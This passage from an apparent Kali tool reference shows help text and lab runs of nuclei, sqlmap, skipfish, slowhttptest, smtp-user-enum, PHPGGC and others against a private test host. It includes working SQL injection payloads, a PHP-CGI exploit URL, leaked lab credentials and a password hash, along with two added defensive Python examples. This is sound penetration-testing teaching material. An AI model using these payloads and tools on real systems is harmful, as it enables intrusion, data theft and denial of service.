-ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts
-sml, -show-match-line show match lines for file templates, works with extractors only
-ztls use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default
-sni string tls sni hostname to use (default: input domain name)
-dka, -dialer-keep-alive value keep-alive duration for network requests.
-lfa, -allow-local-file-access allows file (payload) access anywhere on the system
-lna, -restrict-local-network-access blocks connections to the local / private network
-i, -interface string network interface to use for network scan
-at, -attack-type string type of payload combinations to perform (batteringram,pitchfork,clusterbomb)
-sip, -source-ip string source ip address to use for network scan
-rsr, -response-size-read int max response size to read in bytes
-rss, -response-size-save int max response size to read in bytes (default 1048576)
-reset reset removes all nuclei configuration and data files (including nuclei-templates)
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
-hae, -http-api-endpoint string experimental http api endpoint
INTERACTSH:
-iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)
-itoken, -interactsh-token string authentication token for self-hosted interactsh server
-interactions-cache-size int number of requests to keep in the interactions cache (default 5000)
-interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)
-interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)
-interactions-cooldown-period int extra time for interaction polling before exiting (default 5)
-ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates
FUZZING:
-ft, -fuzzing-type string overrides fuzzing type set in template (replace, prefix, postfix, infix)
-fm, -fuzzing-mode string overrides fuzzing mode set in template (multiple, single)
-fuzz enable loading fuzzing templates (Deprecated: use -dast instead)
-dast enable / run dast (fuzz) nuclei templates
-dfp, -display-fuzz-points display fuzz points in the output for debugging
-fuzz-param-frequency int frequency of uninteresting parameters for fuzzing before skipping (default 10)
-fa, -fuzz-aggression string fuzzing aggression level controls payload count for fuzz (low, medium, high) (default "low")
UNCOVER:
-uc, -uncover enable uncover engine
-uq, -uncover-query string[] uncover search query
-ue, -uncover-engine string[] uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow,google) (default shodan)
-uf, -uncover-field string uncover fields to return (ip,port,host) (default "ip:port")
-ul, -uncover-limit int uncover results to return (default 100)
-ur, -uncover-ratelimit int override ratelimit of engines with unknown ratelimit (default 60 req/min) (default 60)
RATE-LIMIT:
-rl, -rate-limit int maximum number of requests to send per second (default 150)
-rld, -rate-limit-duration value maximum number of requests to send per second (default 1s)
-rlm, -rate-limit-minute int maximum number of requests to send per minute (DEPRECATED)
-bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)
-c, -concurrency int maximum number of templates to be executed in parallel (default 25)
-hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10)
-headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10)
-jsc, -js-concurrency int maximum number of javascript runtimes to be executed in parallel (default 120)
-pc, -payload-concurrency int max payload concurrency for each template (default 25)
-prc, -probe-concurrency int http probe concurrency with httpx (default 50)
OPTIMIZATIONS:
-timeout int time to wait in seconds before timeout (default 10)
-retries int number of times to retry a failed request (default 1)
-ldp, -leave-default-ports leave default HTTP/HTTPS ports (eg. host:80,host:443)
-mhe, -max-host-error int max errors for a host before skipping from scan (default 30)
-te, -track-error string[] adds given error to max-host-error watchlist (standard, file)
-nmhe, -no-mhe disable skipping host from scan based on errors
-project use a project folder to avoid sending same request multiple times
-project-path string set a specific project path (default "/tmp")
-spm, -stop-at-first-match stop processing HTTP requests after the first match (may break template/workflow logic)
-stream stream mode - start elaborating without sorting the input
-ss, -scan-strategy value strategy to use while scanning(auto/host-spray/template-spray) (default auto)
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-nh, -no-httpx disable httpx probing for non-url input
-no-stdin disable stdin processing
HEADLESS:
-headless enable templates that require headless browser support (root user on Linux will disable sandbox)
-page-timeout int seconds to wait for each page in headless mode (default 20)
-sb, -show-browser show the browser on the screen when running templates with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-sc, -system-chrome use local installed Chrome browser instead of nuclei installed
-lha, -list-headless-action list available headless actions
DEBUG:
-debug show all requests and responses
-dreq, -debug-req show all sent requests
-dresp, -debug-resp show all received responses
-p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)
-pi, -proxy-internal proxy all internal requests
-ldf, -list-dsl-function list all supported DSL function signatures
-tlog, -trace-log string file to write sent requests trace log
-elog, -error-log string file to write sent requests error log
-version show nuclei version
-hm, -hang-monitor enable nuclei hang monitoring
-v, -verbose show verbose output
-profile-mem string generate memory (heap) profile & trace files
-vv display templates loaded for scan
-svd, -show-var-dump show variables dump for debugging
-vdl, -var-dump-limit int limit the number of characters displayed in var dump (default 255)
-ep, -enable-pprof enable pprof debugging server
-tv, -templates-version shows the version of the installed nuclei-templates
-hc, -health-check run diagnostic check up
UPDATE:
-ut, -update-templates update nuclei-templates to latest released version
-ud, -update-template-dir string custom directory to install / update nuclei-templates
-duc, -disable-update-check disable automatic nuclei/templates update check
STATISTICS:
-stats display statistics about the running scan
-sj, -stats-json display statistics in JSONL(ines) format
-si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)
-mp, -metrics-port int port to expose nuclei metrics on (default 9092)
CLOUD:
-auth configure projectdiscovery cloud (pdcp) api key (default true)
-tid, -team-id string upload scan results to given team id (optional) (default "none")
-cup, -cloud-upload upload scan results to pdcp dashboard [DEPRECATED use -dashboard]
-sid, -scan-id string upload scan results to existing scan id (optional)
-sname, -scan-name string scan name to set (optional)
-pd, -dashboard upload / view nuclei results in projectdiscovery cloud (pdcp) UI dashboard
-pdu, -dashboard-upload string upload / view nuclei results file (jsonl) in projectdiscovery cloud (pdcp) UI dashboard
AUTHENTICATION:
-sf, -secret-file string[] path to config file containing secrets for nuclei authenticated scan
-ps, -prefetch-secrets prefetch secrets from the secrets file
■ Example
root@kali:~# nuclei -target 192.168.11.4 -exclude-severity info -silent
[CVE-2012-1823] [http] [high] http://192.168.11.4/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
[phpinfo-files] [http] [low] http://192.168.11.4/phpinfo.php [paths="/phpinfo.php"]
[pgsql-default-db] [javascript] [high] 192.168.11.4:5432 [database="template1",password="postgres",usernames="postgres"]
[ssh-diffie-hellman-logjam] [javascript] [low] 192.168.11.4:22
[ssh-cbc-mode-ciphers] [javascript] [low] 192.168.11.4:22
[ssh-weak-algo-supported] [javascript] [medium] 192.168.11.4:22
[ssh-weak-mac-algo] [javascript] [low] 192.168.11.4:22
[ssh-weakkey-exchange-algo] [javascript] [low] 192.168.11.4:22
[CVE-2004-2687] [tcp] [high] 192.168.11.4:3632
[CVE-2020-1938] [tcp] [critical] 192.168.11.4:8009
[CVE-2011-2523] [tcp] [critical] 192.168.11.4:6200
[pgsql-version-detect] [javascript] [high] 192.168.11.4:5432 ["PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)"] [database="postgres",password="postgres",usernames="postgres"]
[pgsql-list-password-hashes] [javascript] [high] 192.168.11.4:5432 ["postgres : md53175bce1d3201d16594cebf9d7eb3f9d"] [database="postgres",password="postgres",usernames="postgres"]
[pgsql-default-db] [javascript] [high] 192.168.11.4:5432 [database="postgres",password="postgres",usernames="postgres"]
[postgres-default-logins] [javascript] [high] 192.168.11.4:5432 [passwords="postgres",usernames="postgres"]
[pgsql-file-read] [javascript] [high] 192.168.11.4:5432 ["postmaster.opts","PG_VERSION","pg_xlog","pg_multixact","global","postmaster.pid","base","pg_tblspc","server.crt","pg_clog","pg_twophase","pg_subtrans","root.crt","server.key"] [database="postgres",password="postgres",usernames="postgres"]
[pgsql-list-users] [javascript] [high] 192.168.11.4:5432 ["postgres"] [database="postgres",password="postgres",usernames="postgres"]
[pgsql-list-database] [javascript] [high] 192.168.11.4:5432 ["template1","template0","postgres"] [database="postgres",password="postgres",usernames="postgres"]
[ftp-anonymous-login] [tcp] [medium] 192.168.11.4:21
PHPGGC
Generates payloads that exploit insecure object deserialization.
■ Usage
root@kali:~# phpggc --help
USAGE
./phpggc [-h|-l|-i|...] <GadgetChain> [arguments]
INFORMATION
-h, --help Displays help
-l, --list [filter] Lists available gadget chains
-i, --information
Displays information about a gadget chain
OUTPUT
-o, --output <file>
Outputs the payload to a file instead of standard output
PHAR
-p, --phar <tar|zip|phar>
Creates a PHAR file of the given format
-pj, --phar-jpeg <file>
Creates a polyglot JPEG/PHAR file from given image
-pp, --phar-prefix <file>
Sets the PHAR prefix as the contents of the given file.
Generally used with -p phar to control the beginning of the generated file.
-pf, --phar-filename <filename>
Defines the name of the file contained in the generated PHAR (default: test.txt)
ENHANCEMENTS
-f, --fast-destruct
Applies the fast-destruct technique, so that the object is destroyed
right after the unserialize() call, as opposed to at the end of the
script
-a, --ascii-strings
Uses the 'S' serialization format instead of the standard 's' for non-printable chars.
This replaces every non-ASCII value to an hexadecimal representation:
s:5:"A<null_byte>B<cr><lf>"; -> S:5:"A\00B\09\0D";
This is experimental and it might not work in some cases.
-A, --armor-strings
Uses the 'S' serialization format instead of the standard 's' for every char.
This replaces every character to an hexadecimal representation:
s:5:"A<null_byte>B<cr><lf>"; -> S:5:"\41\00\42\09\0D";
This is experimental and it might not work in some cases.
Note: Since strings grow by a factor of 3 using this option, the payload can get
really long.
-n, --plus-numbers <types>
Adds a + symbol in front of every number symbol of the given type.
For instance, -n iO adds a + in front of every int and object name size:
O:3:"Abc":1:{s:1:"x";i:3;} -> O:+3:"Abc":1:{s:1:"x";i:+3;}
Note: Since PHP 7.2, only i and d (float) types can have a +
-w, --wrapper <wrapper>
Specifies a file containing at least one wrapper functions:
- process_parameters(array $parameters): called right before object is created
- process_object(object $object): called right before the payload is serialized
- process_serialized(string $serialized): called right after the payload is serialized
ENCODING
-s, --soft Soft URLencode
-u, --url URLencodes the payload
-b, --base64 Converts the output into base64
-j, --json Converts the output into json
Encoders can be chained, for instance -b -u -u base64s the payload,
then URLencodes it twice
CREATION
-N, --new <framework> <type>
Creates the file structure for a new gadgetchain for given framework
Example: ./phpggc -N Drupal RCE
--test-payload
Instead of displaying or storing the payload, includes vendor/autoload.php and unserializes the payload.
The test script can only deserialize __destruct, __wakeup, __toString and PHAR payloads.
Warning: This will run the payload on YOUR system !
■ Example
For a PHPGGC usage example, please refer to my earlier post.
skipfish
Scans a web application and performs security checks.
■ Usage
root@kali:~# skipfish --help
Usage: skipfish [ options ... ] -W wordlist -o output_dir start_url [ start_url2 ... ]
Authentication and access options:
-A user:pass - use specified HTTP authentication credentials
-F host=IP - pretend that 'host' resolves to 'IP'
-C name=val - append a custom cookie to all requests
-H name=val - append a custom HTTP header to all requests
-b (i|f|p) - use headers consistent with MSIE / Firefox / iPhone
-N - do not accept any new cookies
--auth-form url - form authentication URL
--auth-user user - form authentication user
--auth-pass pass - form authentication password
--auth-verify-url - URL for in-session detection
Crawl scope options:
-d max_depth - maximum crawl tree depth (16)
-c max_child - maximum children to index per node (512)
-x max_desc - maximum descendants to index per branch (8192)
-r r_limit - max total number of requests to send (100000000)
-p crawl% - node and link crawl probability (100%)
-q hex - repeat probabilistic scan with given seed
-I string - only follow URLs matching 'string'
-X string - exclude URLs matching 'string'
-K string - do not fuzz parameters named 'string'
-D domain - crawl cross-site links to another domain
-B domain - trust, but do not crawl, another domain
-Z - do not descend into 5xx locations
-O - do not submit any forms
-P - do not parse HTML, etc, to find new links
Reporting options:
-o dir - write output to specified directory (required)
-M - log warnings about mixed content / non-SSL passwords
-E - log all HTTP/1.0 / HTTP/1.1 caching intent mismatches
-U - log all external URLs and e-mails seen
-Q - completely suppress duplicate nodes in reports
-u - be quiet, disable realtime progress stats
-v - enable runtime logging (to stderr)
Dictionary management options:
-W wordlist - use a specified read-write wordlist (required)
-S wordlist - load a supplemental read-only wordlist
-L - do not auto-learn new keywords for the site
-Y - do not fuzz extensions in directory brute-force
-R age - purge words hit more than 'age' scans ago
-T name=val - add new form auto-fill rule
-G max_guess - maximum number of keyword guesses to keep (256)
-z sigfile - load signatures from this file
Performance settings:
-g max_conn - max simultaneous TCP connections, global (40)
-m host_conn - max simultaneous connections, per target IP (10)
-f max_fail - max number of consecutive HTTP errors (100)
-t req_tmout - total request response timeout (20 s)
-w rw_tmout - individual network I/O timeout (10 s)
-i idle_tmout - timeout on idle HTTP connections (10 s)
-s s_limit - response size limit (400000 B)
-e - do not keep binary responses for reporting
Other settings:
-l max_req - max requests per second (0.000000)
-k duration - stop scanning after the given duration h:m:s
--config file - load the specified configuration file
■ Example
root@kali:~# skipfish -o report -O http://192.168.11.4/
Scan statistics:
Scan time : 0:15:34.501
HTTP requests : 538814 (576.7/s), 1350536 kB in, 236585 kB out (1698.4 kB/s)
Compression : 0 kB in, 0 kB out (0.0% gain)
HTTP faults : 12 net errors, 0 proto errors, 0 retried, 0 drops
TCP handshakes : 5581 total (96.7 req/conn)
TCP faults : 0 failures, 12 timeouts, 0 purged
External links : 12843 skipped
Reqs pending : 1147
Database statistics:
Pivots : 2256 total, 1825 done (80.90%)
In progress : 300 pending, 12 init, 4 attacks, 115 dict
Missing nodes : 616 spotted
Node types : 1 serv, 282 dir, 337 file, 642 pinfo, 751 unkn, 241 par, 2 val
Issues found : 2169 info, 4 warn, 6 low, 472 medium, 2 high impact
Dict size : 1061 words (1061 new), 23 extensions, 256 candidates
Signatures : 77 total
[+] Copying static resources...
[+] Sorting and annotating crawl nodes: 2256
[+] Looking for duplicate entries: 2256
[+] Counting unique nodes: 1101
[+] Saving pivot data for third-party tools...
[+] Writing scan description...
[+] Writing crawl tree: 2256
[+] Generating summary views...
[+] Report saved to 'report/index.html' [0x0a541269].
[+] This was a great day for science!
Generated HTML report (crawl results shown as a tree)
Generated HTML report (list of detected issues)
Trace of request and response contents
SlowHTTPTest
Tests slow HTTP attacks.
■ Usage
root@kali:~# slowhttptest -h
Usage: slowhttptest [options ...]
Test modes:
-H slow headers a.k.a. Slowloris (default)
-B slow body a.k.a R-U-Dead-Yet
-R range attack a.k.a Apache killer
-X slow read a.k.a Slow Read
Reporting options:
-g generate statistics with socket state changes (off)
-o file_prefix save statistics output in file.html and file.csv (-g required)
-v level verbosity level 0-4: Fatal, Info, Error, Warning, Debug
General options:
-c connections target number of connections (50)
-i seconds interval between followup data in seconds (10)
-l seconds target test length in seconds (240)
-r rate connections per seconds (50)
-s bytes value of Content-Length header if needed (4096)
-t verb verb to use in request, default to GET for
slow headers and response and to POST for slow body
-u URL absolute URL of target (http://localhost/)
-x bytes max length of each randomized name/value pair of
followup data per tick, e.g. -x 2 generates
X-xx: xx for header or &xx=xx for body, where x
is random character (32)
-f content-type value of Content-type header (application/x-www-form-urlencoded)
-m accept value of Accept header (text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5)
Probe/Proxy options:
-d host:port all traffic directed through HTTP proxy at host:port (off)
-e host:port probe traffic directed through HTTP proxy at host:port (off)
-p seconds timeout to wait for HTTP response on probe connection,
after which server is considered inaccessible (5)
-j cookies value of Cookie header (ex.: -j "user_id=1001; timeout=9000")
Range attack specific options:
-a start left boundary of range in range header (5)
-b bytes limit for range header right boundary values (2000)
Slow read specific options:
-k num number of times to repeat same request in the connection. Use to
multiply response size if server supports persistent connections (1)
-n seconds interval between read operations from recv buffer in seconds (1)
-w bytes start of the range advertised window size would be picked from (1)
-y bytes end of the range advertised window size would be picked from (512)
-z bytes bytes to slow read from receive buffer with single read() call (5)
■ Example
root@kali:~# slowhttptest -u http://192.168.11.4 -R
test type: RANGE
number of connections: 50
URL: http://192.168.11.4/
verb: HEAD
[...]
initializing: 0
pending: 1
connected: 0
error: 0
closed: 0
service available: YES
Thu Nov 14 07:00:20 2024:
Test ended on 1th second
Exit status: No open connections left
smtp-user-enum
Enumerates usernames against an SMTP service.
■ Usage
root@kali:~# smtp-user-enum --help
Usage: smtp-user-enum [-OPTIONS [-MORE_OPTIONS]] [--] [PROGRAM_ARG1 ...]
options are:
-m n Maximum number of processes (default: 5)
-M mode Method to use for username guessing EXPN, VRFY or RCPT (default: VRFY)
-u user Check if user exists on remote system
-f addr MAIL FROM email address. Used only in "RCPT TO" mode (default: user@example.com)
-D dom Domain to append to supplied user list to make email addresses (Default: none)
Use this option when you want to guess valid email addresses instead of just usernames
e.g. "-D example.com" would guess foo@example.com, bar@example.com, etc. Instead of
simply the usernames foo and bar.
-U file File of usernames to check via smtp service
-t host Server host running smtp service
-T file File of hostnames running the smtp service
-p port TCP port on which smtp service runs (default: 25)
-d Debugging output
-w n Wait a maximum of n seconds for reply (default: 5)
-v Verbose
-h This help message
■ Example
root@kali:~# smtp-user-enum -M VRFY -U users.txt -t 192.168.11.4
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 17
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Thu Nov 14 07:48:58 2024 #########
192.168.11.4: test exists
192.168.11.4: guest exists
192.168.11.4: user exists
192.168.11.4: ftp exists
192.168.11.4: mysql exists
192.168.11.4: root exists
######## Scan completed at Thu Nov 14 07:48:58 2024 #########
6 results.
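The VRFY scan above works because the server answers each VRFY with a different code depending on whether the mailbox exists. The following added example (not part of this page or of smtp-user-enum) plays both sides of that exchange against a constructed user list, first with VRFY answered honestly and then with the noncommittal 252 reply that RFC 5321 section 3.5.3 allows, which is what a setting such as Postfix's disable_vrfy_command = yes produces. The user list, host name and reply texts are constructed for illustration.

```python
"""Added example: why VRFY-based user enumeration works and how the
noncommittal 252 reply removes the signal. Everything here is constructed:
the mailbox list, the client commands and the reply texts.
"""

# Constructed local mailbox list; stands in for the server's user database.
LOCAL_USERS = {"root", "ftp", "mysql", "test", "guest", "user"}


def smtp_reply(command: str, verify_enabled: bool) -> str:
    """Return the reply a tiny SMTP server would send for one command line.

    verify_enabled=True models a server that answers VRFY/EXPN honestly
    (250 = mailbox exists, 550 = unknown), which is exactly the difference
    smtp-user-enum's default VRFY mode keys on. verify_enabled=False models
    the hardened setting: every VRFY gets the same 252, so nothing leaks.
    """
    verb, _, arg = command.strip().partition(" ")
    verb = verb.upper()
    if verb in ("HELO", "EHLO"):
        return "250 mail.example.test"
    if verb in ("VRFY", "EXPN"):
        if not verify_enabled:
            return "252 2.5.2 Cannot VRFY user, but will accept message and attempt delivery"
        # Drop an optional @domain part so "root@example.test" matches "root".
        user = arg.split("@")[0].strip()
        if user in LOCAL_USERS:
            return f"250 2.1.5 {user}@mail.example.test"
        return f"550 5.1.1 <{user}>: Recipient address rejected: User unknown"
    if verb == "QUIT":
        return "221 2.0.0 Bye"
    return "502 5.5.2 Error: command not recognized"


def enumerate_by_vrfy(candidates, verify_enabled: bool) -> list:
    """Client side of the exchange: send VRFY for each candidate and keep the
    names a scanner would report as existing (those answered with 250)."""
    found = []
    for name in candidates:
        reply = smtp_reply(f"VRFY {name}", verify_enabled)
        if reply.startswith("250"):
            found.append(name)
    return found


if __name__ == "__main__":
    wordlist = ["alice", "root", "bob", "ftp", "mysql"]  # constructed wordlist
    for enabled in (True, False):
        print(f"VRFY enabled={enabled}: found {enumerate_by_vrfy(wordlist, enabled)}")
```

With VRFY answered honestly the client learns root, ftp and mysql from five guesses; with the 252 reply every guess looks identical and the list comes back empty, which is the behaviour to look for when checking a mail server against this tool.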
sqlmap
Tests for SQL injection vulnerabilities.
■ Usage
root@kali:~# sqlmap --help
Usage: python3 sqlmap [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
These options do not fit into any other category
--wizard Simple wizard interface for beginner users
■ Example
root@kali:~# sqlmap -u "http://192.168.11.4/dvwa/vulnerabilities/sqli/?id=1*&Submit=Submit" \
--cookie "PHPSESSID=04d676deca8b0f224210c81f83fd5b61;security=medium" \
--level=5 --risk=3 --dbms=MySQL
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[02:18:09] [INFO] flushing session file
[02:18:09] [INFO] testing connection to the target URL
[02:18:10] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:18:10] [INFO] testing if the target URL content is stable
[02:18:10] [INFO] target URL content is stable
[02:18:10] [INFO] testing if URI parameter '#1*' is dynamic
[02:18:10] [WARNING] URI parameter '#1*' does not appear to be dynamic
[02:18:10] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[...]
sqlmap identified the following injection point(s) with a total of 250 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: http://192.168.11.4/dvwa/vulnerabilities/sqli/?id=1 OR NOT 4055=4055&Submit=Submit
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://192.168.11.4/dvwa/vulnerabilities/sqli/?id=1 AND ROW(3056,2488)>(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT (ELT(3056=3056,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM (SELECT 8039 UNION SELECT 9934 UNION SELECT 7414 UNION SELECT 9367)a GROUP BY x)&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.11.4/dvwa/vulnerabilities/sqli/?id=1 AND (SELECT 9720 FROM (SELECT(SLEEP(5)))EQKY)&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: http://192.168.11.4/dvwa/vulnerabilities/sqli/?id=1 UNION ALL SELECT CONCAT(0x716a707a71,0x4e56456d565748655149425a6d4758726b7a6763685563446c59595171514b466c71755672694a7a,0x7171626a71),NULL-- -&Submit=Submit
---
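The boolean-based payload sqlmap reported above only works because the id parameter is pasted into the SQL text. The following added example (not from this page, sqlmap or DVWA) shows the vulnerable concatenation next to a parameterised query, run against an in-memory SQLite table constructed to stand in for DVWA's users table. The payload with the false condition is the one sqlmap printed; its true-condition twin is constructed here to show the row-count difference that boolean-based blind detection relies on.

```python
"""Added example: string-concatenated versus parameterised SQL, exercised
with the boolean-based payload from the sqlmap output on this page.
The table contents are constructed; no MySQL or DVWA instance is needed.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for DVWA's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, first_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [(1, "admin"), (2, "Gordon"), (3, "Hack"), (4, "Pablo"), (5, "Bob")],
    )
    return conn


def lookup_concat(conn: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable form: the request parameter becomes part of the SQL text,
    so anything after the number is parsed as part of the WHERE clause."""
    sql = f"SELECT first_name FROM users WHERE id = {user_id} ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened form: the value travels as a bound parameter. The database
    compares id against the whole string; it is never parsed as SQL."""
    sql = "SELECT first_name FROM users WHERE id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (user_id,))]


NORMAL = "1"
PAYLOAD_FALSE = "1 OR NOT 4055=4055"  # taken from the sqlmap output above
PAYLOAD_TRUE = "1 OR NOT 4055=4056"   # constructed counterpart (condition true)


def demo() -> dict:
    """Run every input through both query styles and collect the rows."""
    conn = make_db()
    return {
        "concat_normal": lookup_concat(conn, NORMAL),
        "concat_false": lookup_concat(conn, PAYLOAD_FALSE),
        "concat_true": lookup_concat(conn, PAYLOAD_TRUE),
        "param_normal": lookup_param(conn, NORMAL),
        "param_false": lookup_param(conn, PAYLOAD_FALSE),
        "param_true": lookup_param(conn, PAYLOAD_TRUE),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:14s} -> {rows}")
```

In the concatenated version the false payload returns the same single row as id=1 while the true payload returns every row, and that observable difference is what sqlmap's boolean-based blind technique measures. In the parameterised version both payloads return nothing, because the string "1 OR NOT 4055=4055" is simply an id that no row has; only the plain "1" still matches.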
WAFW00F
Guesses which WAF (web application firewall) product is in use from its fingerprint.
■ Usage
root@kali:~# wafw00f --help
Usage: wafw00f url1 [url2 [url3 ... ]]
Options:
-h, --help show this help message and exit
-v, --verbose Enable verbosity, multiple -v options increase
verbosity
-a, --findall Find all WAFs which match the signatures, do not stop
testing on the first one
-r, --noredirect Do not follow redirections given by 3xx responses
-t TEST, --test=TEST Test for one specific WAF
-o OUTPUT, --output=OUTPUT
Write output to csv, json or text file depending on
file extension. For stdout, specify - as filename.
-f FORMAT, --format=FORMAT
Force output format to csv, json or text.
-i INPUT, --input-file=INPUT
Read targets from a file. Input format can be csv,
json or text. For csv and json, a `url` column name or
element is required.
-l, --list List all WAFs that WAFW00F is able to detect
-p PROXY, --proxy=PROXY
Use an HTTP proxy to perform requests, examples:
http://hostname:8080, socks5://hostname:1080,
http://user:pass@hostname:8080
-V, --version Print out the current version of WafW00f and exit.
-H HEADERS, --headers=HEADERS
Pass custom headers via a text file to overwrite the
default header set.
■ Example
root@kali:~# wafw00f https://192.168.11.4
[*] Checking https://192.168.11.4
[+] The site https://192.168.11.4 is behind Wordfence (Defiant) WAF.
[~] Number of requests: 2
Wapiti
Scans a web application for vulnerabilities.
■ Usage
root@kali:~# wapiti --help
usage: wapiti [-h] [-u URL] [--scope {page,folder,domain,url,punk}] [-m MODULES_LIST] [--list-modules] [--update] [-l LEVEL] [-p PROXY_URL]
[--tor] [-a CREDENTIALS] [--auth-type {basic,digest,kerberos,ntlm,post}] [-c COOKIE_FILE] [--skip-crawl] [--resume-crawl]
[--flush-attacks] [--flush-session] [--store-session PATH] [--store-config PATH] [-s URL] [-x URL] [-r PARAMETER]
[--skip PARAMETER] [-d DEPTH] [--max-links-per-page MAX] [--max-files-per-dir MAX] [--max-scan-time SECONDS]
[--max-attack-time SECONDS] [--max-parameters MAX] [-S FORCE] [-t SECONDS] [-H HEADER] [-A AGENT] [--verify-ssl {0,1}] [--color]
[-v LEVEL] [-f FORMAT] [-o OUPUT_PATH] [--external-endpoint EXTERNAL_ENDPOINT_URL] [--internal-endpoint INTERNAL_ENDPOINT_URL]
[--endpoint ENDPOINT_URL] [--no-bugreport] [--version]
options:
-h, --help show this help message and exit
-u URL, --url URL The base URL used to define the scan scope (default scope is folder)
--scope {page,folder,domain,url,punk}
Set scan scope
-m MODULES_LIST, --module MODULES_LIST
List of modules to load
--list-modules List Wapiti attack modules and exit
--update Update Wapiti attack modules and exit
-l LEVEL, --level LEVEL
Set attack level
-p PROXY_URL, --proxy PROXY_URL
Set the HTTP(S) proxy to use. Supported: http(s) and socks proxies
--tor Use Tor listener (127.0.0.1:9050)
-a CREDENTIALS, --auth-cred CREDENTIALS
Set HTTP authentication credentials
--auth-type {basic,digest,kerberos,ntlm,post}
Set the authentication type to use
-c COOKIE_FILE, --cookie COOKIE_FILE
Set a JSON cookie file to use
--skip-crawl Don't resume the scanning process, attack URLs scanned during a previous session
--resume-crawl Resume the scanning process (if stopped) even if some attacks were previously performed
--flush-attacks Flush attack history and vulnerabilities for the current session
--flush-session Flush everything that was previously found for this target (crawled URLs, vulns, etc)
--store-session PATH Directory where to store attack history and session data.
--store-config PATH Directory where to store configuration databases.
-s URL, --start URL Adds an url to start scan with
-x URL, --exclude URL
Adds an url to exclude from the scan
-r PARAMETER, --remove PARAMETER
Remove this parameter from urls
--skip PARAMETER Skip attacking given parameter(s)
-d DEPTH, --depth DEPTH
Set how deep the scanner should explore the website
--max-links-per-page MAX
Set how many (in-scope) links the scanner should extract for each page
--max-files-per-dir MAX
Set how many pages the scanner should explore per directory
--max-scan-time SECONDS
Set how many seconds you want the scan to last (floats accepted)
--max-attack-time SECONDS
Set how many seconds you want each attack module to last (floats accepted)
